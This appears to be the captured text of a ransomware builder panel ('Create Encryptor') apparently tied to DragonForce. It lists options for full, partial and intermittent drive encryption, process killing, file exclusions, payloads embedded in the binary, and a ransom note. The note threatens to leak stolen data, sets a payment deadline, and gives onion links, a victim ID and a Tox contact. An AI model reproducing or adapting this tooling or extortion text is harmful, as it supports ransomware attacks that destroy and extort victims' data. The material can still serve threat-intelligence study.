Create Encryptor
Basic Configuration
Artifact Name *
Binary filename (alphanumeric, dashes, underscores only, max 64 bytes)
Encryption Strategy
Encryption Mode *
Mode 10 - Full Drive Encryption (Recommended)
Mode 11 - Full Drive Encryption (Alternative)
Mode 12 - Partial Drive Encryption
Mode 14 - Specific Target Paths
Mode 10 enumerates all drives. Mode 14 requires target paths below.
⚠️ Mode 14 requires at least one target path. Configure in "Target Paths" section below.
Performance Tuning
Full Encryption Threshold
(2.00 MB) Files ≤ this size: fully encrypted
Header-Only Threshold
(10.00 MB) Files ≥ this size: only header encrypted
Header Encryption Size
(3.00 MB) Bytes to encrypt from large files
Intermittent Encryption Percentage
Percentage of file encrypted in intermittent mode
Target Paths (Mode 14 Only)
⚠️ Only used when Encryption Mode is set to Mode 14
Add Target Path
Specify exact directories or drives to encrypt. Flag purpose unknown (check if uncertain).
Process Termination
Process Kill List
Comma or newline separated (max 479 bytes after conversion)
File & Folder Exclusions
Directory Whitelist
Comma or newline separated (max 101 bytes)
File Extension Whitelist
Comma or newline separated (max 52 bytes)
Filename Whitelist
Specific filenames to skip - pipe-separated (max 100 bytes)
Encrypted File Extension
Extension for encrypted files (max 22 bytes)
Logging Configuration
Enable Logging
Log File Path
Location for encryption activity log (max 200 bytes)
Embedded Files (Optional)
▼
Embed additional files directly into the binary for extraction at runtime.
Embedded File #1
Optional file to embed (max 10 MB)
Extraction Path for File #1
Where to extract this file at runtime
Embedded File #2
Optional file to embed (max 10 MB)
Extraction Path for File #2
Where to extract this file at runtime
⚠️ Files are appended to the binary and extracted during execution. Max 10 MB per file recommended.
Ransom Note (Optional)
▼
Custom Ransom Note
Good afternoon, You have been attacked by DragonForce Ransomware. We offer you a deal - contact us using the instructions below. We keep our word. You have a chance to decrypt your files and avoid publication on our blog. Deadline for decryptor deletion and blog publication: 10/10/2025 00:00 UTC. - # 1 Communication Process, Click the link in #2 to begin negotiations. You may request: 1. a test decrypt. 2. a list of stolen files. We set the price based on your income/insurance after reviewing your documents. - # 2 Access to the meeting room, Download Tor Browser: https://www.torproject.org/ Then visit: http://3pktcrcbmssvrnwe5skburdwe2h3v6ibdnn5kbjqihsg6eu6s6b7ryqd.onion Your unique ID: C92B29FEEF5488A6C92B29FEEF5488A6 - # 3 Additional Support, Tox: 1C054B722BCBF41A918EF3C485712742088F5C3E81B2FDD91ADEA6BA55F4A856D90A65E99D20 - # 4 Recommendations, Do not try to recover files with third-party programs. Do not turn off / reboot your computer. Be courteous. Do not procrastinate. - # 5 Blog and News, Blog: http://z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid.onion DragonNews: http://z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid.onion/news
Custom ransom note text (max 1992 bytes). Leave empty to use default note from binary.
Create Encryptor